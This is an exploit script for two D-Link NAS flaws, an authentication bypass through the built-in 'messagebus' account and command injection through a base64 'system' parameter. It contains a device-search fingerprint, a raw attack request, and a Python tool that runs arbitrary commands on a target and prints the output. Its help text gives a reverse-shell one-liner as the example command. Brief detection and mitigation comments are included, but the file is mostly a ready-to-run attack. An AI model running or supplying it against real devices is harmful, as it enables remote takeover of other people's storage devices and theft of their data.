D-Link NAS (CVE-2024-3272 and CVE-2024-3273)
body="Text:In order to access the ShareCenter"
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd==&cmd=15&system=aWQ= HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/40.0.874.0 Safari/531.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
# Author: Nick Swink (c0rnbread)
# Original post: https://github.com/netsecfish/dlink
# CVE-2024-3272 + CVE-2024-3273
#
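# Description: Backdoor Authentication Bypass + Command Injection
#   CVE-2024-3272: nas_sharing.cgi accepts the built-in "messagebus" account with an empty password.
#   CVE-2024-3273: the base64-encoded "system" parameter of the same endpoint is run as a command.
# Detection: look for requests to /cgi-bin/nas_sharing.cgi carrying user=messagebus and a
#   system= parameter in web server, proxy or IDS logs.
# Mitigation: the vendor treats these models as end-of-life, so plan to retire or replace them
#   and keep the management interface off untrusted networks.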
# Affected Devices:
# DNS-320L Version 1.11, Version 1.03.0904.2013, Version 1.01.0702.2013
# DNS-325 Version 1.01
# DNS-327L Version 1.09, Version 1.00.0409.2013
# DNS-340L Version 1.08
import requests , argparse , base64
def main(url, command):
    """Send one proof-of-concept request to nas_sharing.cgi and print the reply.

    The command string is UTF-8 encoded, base64-encoded and placed in the
    ``system`` query parameter. The request also carries ``user=messagebus``,
    an empty ``passwd`` and ``cmd=15``. That query string on the path
    /cgi-bin/nas_sharing.cgi is the pattern to match on in access logs.

    Args:
        url: Base URL of the device's web interface; the path and query are
            appended to it unchanged.
        command: Text that is base64-encoded into the ``system`` parameter.

    Returns:
        None. Everything is reported on stdout. On a non-200 status the
        function prints a failure message and calls ``exit()``.
    """
    encoded = base64.b64encode(command.encode('utf-8')).decode('utf-8')
    # The trailing space inside this literal is reproduced from the listing as-is.
    endpoint = f"/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={encoded} "
    target = url + endpoint

    print("Sending exploit request to endpoint...")
    print(target)
    response = requests.get(target)

    # Anything other than HTTP 200 is reported as a failure and ends the run.
    if response.status_code != 200:
        print("Status NOT 200")
        print("Exploit Failed. Exiting...")
        exit()

    # A 200 is only an *apparent* success: nothing here confirms the command
    # ran. The response body is assumed to be base64 text and is decoded
    # before printing.
    print("Status code: 200")
    print("Exploit appeared to succeed!")
    decoded_body = base64.b64decode(response.text).decode('utf-8')
    print(f"\n \t Printing output: {decoded_body} ")
if __name__ == "__main__":
    # Command-line entry point: two positional arguments (base URL, command
    # text) are parsed and handed straight to main() without validation.
    cli = argparse.ArgumentParser(description="Execute arbitrary command on remote system.")
    positional_args = (
        ("url", "Base URL of the D-Link web interface. e.g., http://example.com"),
        ("command", "Command to be executed. e.g., /bin/sh -i >& /dev/tcp/localhost/9999 0>&1"),
    )
    for arg_name, arg_help in positional_args:
        cli.add_argument(arg_name, help=arg_help)
    opts = cli.parse_args()
    main(opts.url, opts.command)